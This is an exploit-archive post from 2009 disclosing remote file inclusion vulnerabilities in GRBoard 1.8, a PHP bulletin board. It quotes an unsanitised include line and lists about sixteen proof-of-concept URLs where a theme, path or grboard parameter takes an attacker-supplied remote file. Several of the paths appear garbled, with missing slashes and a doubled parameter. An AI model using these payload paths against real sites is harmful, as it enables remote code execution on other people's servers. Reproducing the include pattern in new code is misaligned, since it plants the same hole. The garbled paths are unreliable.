[Exploit]  [Remote]  [Local]  [Web Apps]  [Dos/Poc]  [Shellcode]  [RSS]

# Title : GRBoard 1.8 Multiple Remote File Inclusion Vulnerabilities
# Published : 2009-02-04
# Author : make0day
# Previous Title : rgboard v4 5p1 (07.07.27) Multiple Remote Vulnerabilities
# Next Title : PHPbbBook 1.3 (bbcode.php l) Local File Inclusion Exploit


GRBoard 1.8 Remote File Inclusion Vulnerability
bY make0day@gmail.com

/*************************

GRBoard (VERSION 1.8 )is bulletin board system of Korea.
It is freely available for all platforms that supports PHP and MySQL.
But I find Remote File Inclusion vulnerability.
Here is the details:

**************************/
TEST ON VERSION GRBoard 1.8 
Download : http://sirini.net/v22/?get=grboard
/***************************
Remote File Inclusion Vulnerability

/form_mail.php

include $grboard.'/db_info.php'; //File Include

*************************/

poc:

/theme/179_squarebox_pds_list/view.php?theme=[RFI]
/theme179_squarebox_minishop_expandview.php?theme=[RFI]
/theme179_squarebox_gallery_list_pdsview.php?theme=theme=[RFI]
/theme179_squarebox_gallery_listview.php?theme=[RFI]
/theme179_squarebox_galleryview.php?theme=[RFI]
/theme179_squarebox_board_swfuploadview.php?theme=[RFI]
/theme179_squarebox_board_expandview.php?theme=[RFI]
/theme179_squarebox_board_basic_with_grcodeview.php?theme=[RFI]
/theme179_squarebox_board_basicview.php?theme=[RFI]
/theme179_simplebar_pds_listview.php?theme=[RFI]
/theme179_simplebar_noticeview.php?theme=[RFI]
/theme179_simplebar_gallery_list_pdsview.php?theme=[RFI]
/theme179_simplebar_galleryview.php?theme=[RFI]
/theme179_simplebar_basicview.php?theme=[RFI]
/latest/sirini_gallery_latest/list.php?path=[RFI]
/include.php?grboard=[RFI]

# www.Syue.com [2009-02-04]